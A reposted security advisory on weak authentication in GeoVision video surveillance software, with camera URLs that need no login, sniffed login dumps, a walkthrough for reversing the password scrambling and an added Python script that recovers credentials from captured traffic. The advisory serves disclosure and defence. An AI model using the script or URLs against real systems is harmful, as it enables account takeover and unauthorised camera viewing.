[Repost] GeoVision Digital Video Surveillance System: Multiple Privilege Escalation Vulnerabilities
Source: [url]www.securiteam.com[/url]
Summary
"The GeoVision Digital Video Surveillance System is a PCI card based digital video surveillance range for Microsoft Windows platforms. The GeoVision system is expandable to support POS, Central Monitoring Station and License Plate Recognition Systems. The GeoVision system is in use in commercial and residential installations worldwide."
Multiple issues have been found in the GeoVision Digital Video Surveillance System; all of them stem from weak authentication mechanisms. Sniffed authentication credentials can be replayed as-is, or unscrambled to recover the original password. In certain configurations, still pictures from the security cameras can be viewed without providing any authentication at all.
Credit:
The information has been provided by Tirath Rai.
The original article can be found at: [url]http://www.esqo.com/research/advisories/2005/100505-1.txt[/url]
Details
Vulnerable Systems:
* GeoVision Digital Video Surveillance System version 7.0 and prior
Privilege Escalation 1:
When the GeoVision software is set to create JPEG images for use with the JPEG Image Viewer, no authentication is required to fetch those images.
Using GeoVision's own public demonstration server as an example, the following URLs return camera images directly. This holds even for servers configured to require a username and password; the GeoVision demonstration itself asks only for a username before showing footage. The technique works on GeoVision systems configured to create JPEG images. It also works on GeoVision systems that do not have the 'Enhanced Network Security' feature enabled, which is understood to be the default setting.
Proof of Concept:
[url]http://webcam.geovision.com.tw/cam0.jpg[/url]
...
[url]http://webcam.geovision.com.tw/cam3.jpg[/url]
Privilege Escalation 2:
During authentication with the live playback client, the username part of the credentials is passed in plain text. In this partial dump, taken with tcpflow, the username is seen to be 'gvUser'.
Network dump of an authentication attempt:
--------------------- Network traffic sniffer ---------------------
192.168.105.136:01187-192.168.105.130:00514: ....
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
192.168.105.136:01186-192.168.105.130:04550: 2.
-------------------------------------------------------------------
The password is scrambled with a simple transformation of the hex values of its ASCII characters. The scrambling is easy to reverse, as the example below shows.
Sniff from network:
--------------------- Network traffic sniffer ---------------------
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
-------------------------------------------------------------------
Here we see the username 'gvUser', still in plain text, and the scrambled password '7d6a6666636e'. Going from the scrambled string back to the original password takes a few simple steps.
Split the string into pairs of hex strings:
0x7d
0x6a
0x66
0x66
0x63
0x6e
Each pair represents one character in the original password, so this scrambled string is for a password of 6 characters.
Iterate through the pairs, subtracting a decreasing offset from each one. The offset for the first pair equals the password length (0x6 here, since the password has 6 characters), and it decreases by one for each following pair, so the last pair has 0x1 subtracted.
0x7d - 0x6 = 0x77
0x6a - 0x5 = 0x65
0x66 - 0x4 = 0x62
0x66 - 0x3 = 0x63
0x63 - 0x2 = 0x61
0x6e - 0x1 = 0x6d
Then use an ASCII table to translate the results into characters:
0x77 = w
0x65 = e
0x62 = b
0x63 = c
0x61 = a
0x6d = m
So the original password was 'webcam'.
This issue affects all of the authentication options below:
Mpeg4 Encoder Viewer
56kMpegView0.htm
LanMpegView0.htm
MultiView.htm
Remote Play Back
PlayBackX.htm
Emap
Emap.htm
For the JPEG Image Viewer (JPGLogin.htm), the credentials are sent with an HTTP POST entirely in plain text; no scrambling is used at all, as seen below.
--------------------- Network traffic sniffer ---------------------
192.168.105.130:34707-192.168.105.136:80 POST /password HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, */*
Referer: [url]http://192.168.105.136/JPGLogin.htm[/url]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 192.168.1.5
Content-Length: 37
Connection: Keep-Alive
Cache-Control: no-cache
id=gvUser&pwd=webcam&send=Submit
-------------------------------------------------------------------
Here the id= value is the username and the pwd= value is the password.
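The following is an added worked example, not code from the advisory or from GeoVision: it implements the descrambling steps described above for the Mpeg4/PlayBack/Emap logins as a general routine (byte i of an n-byte password has n - i added to it), adds the inverse transform so a captured blob can be checked against a guessed password, and extracts credentials both from a tcpflow line of the viewer login and from the JPGLogin.htm POST body. The sample inputs are the two captures quoted in the advisory; the function names, the assumption that the password is ASCII, and the regex for tcpflow's '.'-for-non-printable output layout are this example's own.

```python
"""Worked example: reversing the GeoVision remote-viewer password scrambling.

Added illustration; not GeoVision's code. Function names, the ASCII-only
assumption and the tcpflow line layout are assumptions of this example.
"""
import re
from urllib.parse import parse_qs

# Constructed sample: the client -> server line from the advisory's tcpflow dump.
FLOW_LINE = "192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser."

# Constructed sample: the JPGLogin.htm form body from the advisory's HTTP capture.
POST_BODY = "id=gvUser&pwd=webcam&send=Submit"


def descramble(scrambled_hex: str) -> str:
    """Recover the password from the hex blob seen on the wire.

    Each hex pair is one character; for an n-character password, pair i
    had (n - i) added to it, so the first pair is offset by n and the last by 1.
    """
    raw = bytes.fromhex(scrambled_hex)
    n = len(raw)
    out = bytearray()
    for i, b in enumerate(raw):
        c = b - (n - i)
        if not 0 <= c < 0x80:           # assumption: passwords are plain ASCII
            raise ValueError(f"pair {i} (0x{b:02x}) does not descramble to ASCII")
        out.append(c)
    return out.decode("ascii")


def scramble(password: str) -> str:
    """Inverse of descramble(): what the client would send for this password."""
    raw = password.encode("ascii")
    n = len(raw)
    shifted = [b + (n - i) for i, b in enumerate(raw)]
    if any(v > 0xFF for v in shifted):
        raise ValueError("password too long for a one-byte shift")
    return bytes(shifted).hex()


def credentials_from_flow_line(line: str) -> tuple[str, str]:
    """Pull (username, password) out of one tcpflow line of the viewer login.

    tcpflow prints non-printable bytes as '.', so the record ends in
    '.<scrambled hex>.<username>.' (assumed layout from the advisory's dump).
    The end-of-line anchor keeps the regex off the dotted IP addresses.
    """
    m = re.search(r"\.([0-9a-f]+)\.(\w+)\.\s*$", line)
    if m is None or len(m.group(1)) % 2:
        raise ValueError("no login record found in line")
    return m.group(2), descramble(m.group(1))


def credentials_from_post(body: str) -> tuple[str, str]:
    """JPGLogin.htm sends id= and pwd= unscrambled in the POST body."""
    form = parse_qs(body)
    return form["id"][0], form["pwd"][0]


if __name__ == "__main__":
    print(credentials_from_flow_line(FLOW_LINE))   # ('gvUser', 'webcam')
    print(credentials_from_post(POST_BODY))        # ('gvUser', 'webcam')
    print(scramble("webcam"))                      # 7d6a6666636e
```

Because the transform is a fixed per-position offset with no key or nonce, a captured blob can be replayed unchanged, and scramble() lets a defender confirm that a sniffed value corresponds to a known account password without ever decoding it.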
Vendor Status:
In version 7.0 the vendor added a feature called 'Enhanced Network Security' that is supposed to address this issue, but it is not enabled by default.